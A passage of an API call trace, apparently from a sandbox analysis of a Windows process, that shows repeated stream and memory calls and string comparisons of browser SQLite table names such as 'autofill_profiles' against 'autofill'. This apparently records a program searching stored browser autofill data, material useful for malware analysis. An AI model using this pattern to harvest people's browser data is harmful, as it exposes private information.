libNewSize=0x52da7e) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x6bdc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x6bdc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x6bdd, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x6bde, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.070] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2edb848 [0591.070] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da74 | out: ppstm=0x52da74*=0x63a0f8) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x6bdf, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0a8, libNewSize=0x2edb848) returned 0x0 [0591.070] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2edb848) returned 0x0 [0591.070] LocalFree (hMem=0x2edb848) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.070] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56fe98 [0591.070] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.071] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.071] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.071] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.071] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.071] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.071] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.071] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0591.071] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0591.071] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.071] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0591.071] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.071] LocalAlloc (uFlags=0x40, uBytes=0x91) returned 0x56ffd8 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.071] IStream:SetSize (This=0x63a0f8, libNewSize=0x56ffd8) returned 0x0 [0591.071] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1a20 [0591.071] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.071] LocalAlloc (uFlags=0x40, uBytes=0x91) returned 0x56ffd8 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x1d, cb=0x0, dwLockType=0x0) returned 0x0 [0591.071] IStream:SetSize (This=0x63a0f8, libNewSize=0x56ffd8) returned 0x0 [0591.071] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1978 [0591.071] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x2e, cb=0x0, dwLockType=0x0) returned 0x0 [0591.071] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da13) returned 0x0 [0591.071] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0591.071] LocalAlloc (uFlags=0x40, uBytes=0x205) returned 0x2edb848 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.071] IStream:LockRegion (This=0x63a0f8, libOffset=0x2f, cb=0x0, dwLockType=0x0) returned 0x0 [0591.071] IStream:SetSize (This=0x63a0f8, libNewSize=0x2edb848) returned 0x0 [0591.071] LocalAlloc (uFlags=0x40, uBytes=0x20d) returned 0x2edba58 [0591.071] LocalFree (hMem=0x2edb848) returned 0x0 [0591.071] LocalFree (hMem=0x56fe98) returned 0x0 [0591.071] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.071] lstrcmpiA (lpString1="autofill_profiles", lpString2="autofill") returned 1 [0591.071] LocalFree (hMem=0x58d970) returned 0x0 [0591.071] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.071] LocalFree (hMem=0x5d1978) returned 0x0 [0591.071] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.071] LocalFree (hMem=0x2edba58) returned 0x0 [0591.072] LocalFree (hMem=0x56ff38) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0a8, libOffset=0x6b99, cb=0x0, dwLockType=0x0) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0a8, libOffset=0x6b99, cb=0x0, dwLockType=0x0) returned 0x0 [0591.072] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0a8, libOffset=0x6b9a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.072] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.072] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2edb848 [0591.072] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da74 | out: ppstm=0x52da74*=0x63a0f8) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0a8, libOffset=0x6b9b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.072] IStream:SetSize (This=0x63a0a8, libNewSize=0x2edb848) returned 0x0 [0591.072] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2edb848) returned 0x0 [0591.072] LocalFree (hMem=0x2edb848) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.072] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.072] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.072] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.072] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.072] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.072] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.072] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.072] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0591.072] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.072] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.072] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0591.072] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.072] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x63ff30 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0591.072] IStream:SetSize (This=0x63a0f8, libNewSize=0x63ff30) returned 0x0 [0591.072] LocalAlloc (uFlags=0x40, uBytes=0xac) returned 0x2ed9918 [0591.072] LocalFree (hMem=0x63ff30) returned 0x0 [0591.072] LocalAlloc (uFlags=0x40, uBytes=0x91) returned 0x56ffd8 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.072] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x2f, cb=0x0, dwLockType=0x0) returned 0x0 [0591.073] IStream:SetSize (This=0x63a0f8, libNewSize=0x56ffd8) returned 0x0 [0591.073] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1978 [0591.073] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x40, cb=0x0, dwLockType=0x0) returned 0x0 [0591.073] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da13) returned 0x0 [0591.073] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0591.073] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0591.073] LocalFree (hMem=0x56ff38) returned 0x0 [0591.073] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.073] lstrcmpiA (lpString1="sqlite_autoindex_autofill_profiles_1", lpString2="autofill") returned 1 [0591.073] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.073] LocalFree (hMem=0x2ed9918) returned 0x0 [0591.073] LocalFree (hMem=0x5d1978) returned 0x0 [0591.073] LocalFree (hMem=0x58d970) returned 0x0 [0591.073] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.073] LocalFree (hMem=0x56fe98) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0a8, libOffset=0x6adb, cb=0x0, dwLockType=0x0) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0a8, libOffset=0x6adb, cb=0x0, dwLockType=0x0) returned 0x0 [0591.073] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0a8, libOffset=0x6adc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.073] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0a8, libOffset=0x6add, cb=0x0, dwLockType=0x0) returned 0x0 [0591.073] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.073] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2edb848 [0591.073] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da74 | out: ppstm=0x52da74*=0x63a0f8) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0a8, libOffset=0x6ade, cb=0x0, dwLockType=0x0) returned 0x0 [0591.073] IStream:SetSize (This=0x63a0a8, libNewSize=0x2edb848) returned 0x0 [0591.073] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2edb848) returned 0x0 [0591.073] LocalFree (hMem=0x2edb848) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.073] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.073] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56fe98 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.073] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.073] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.073] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.073] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.074] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.074] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.074] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.074] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0591.074] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0591.074] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.074] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0591.074] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.074] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x56ffd8 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.074] IStream:SetSize (This=0x63a0f8, libNewSize=0x56ffd8) returned 0x0 [0591.074] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0x5d1978 [0591.074] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.074] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x56ffd8 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x22, cb=0x0, dwLockType=0x0) returned 0x0 [0591.074] IStream:SetSize (This=0x63a0f8, libNewSize=0x56ffd8) returned 0x0 [0591.074] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0x5d1a20 [0591.074] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x38, cb=0x0, dwLockType=0x0) returned 0x0 [0591.074] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da13) returned 0x0 [0591.074] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0591.074] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed7a0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0f8, libOffset=0x39, cb=0x0, dwLockType=0x0) returned 0x0 [0591.074] IStream:SetSize (This=0x63a0f8, libNewSize=0x5ed7a0) returned 0x0 [0591.074] LocalAlloc (uFlags=0x40, uBytes=0x10a) returned 0x5edae8 [0591.074] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.074] LocalFree (hMem=0x56fe98) returned 0x0 [0591.074] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.074] lstrcmpiA (lpString1="autofill_profile_names", lpString2="autofill") returned 1 [0591.074] LocalFree (hMem=0x58d970) returned 0x0 [0591.074] LocalFree (hMem=0x5d1978) returned 0x0 [0591.074] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.074] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.074] LocalFree (hMem=0x5edae8) returned 0x0 [0591.074] LocalFree (hMem=0x56ff38) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0a8, libOffset=0x6a5b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0a8, libOffset=0x6a5b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.074] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0a8, libOffset=0x6a5c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.074] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.074] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2edb848 [0591.074] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da74 | out: ppstm=0x52da74*=0x63a0f8) returned 0x0 [0591.074] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.075] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.075] IStream:LockRegion (This=0x63a0a8, libOffset=0x6a5d, cb=0x0, dwLockType=0x0) returned 0x0 [0591.075] IStream:SetSize (This=0x63a0a8, libNewSize=0x2edb848) returned 0x0 [0591.075] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2edb848) returned 0x0 [0591.075] LocalFree (hMem=0x2edb848) returned 0x0 [0591.075] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.075] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.075] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.075] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.075] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, 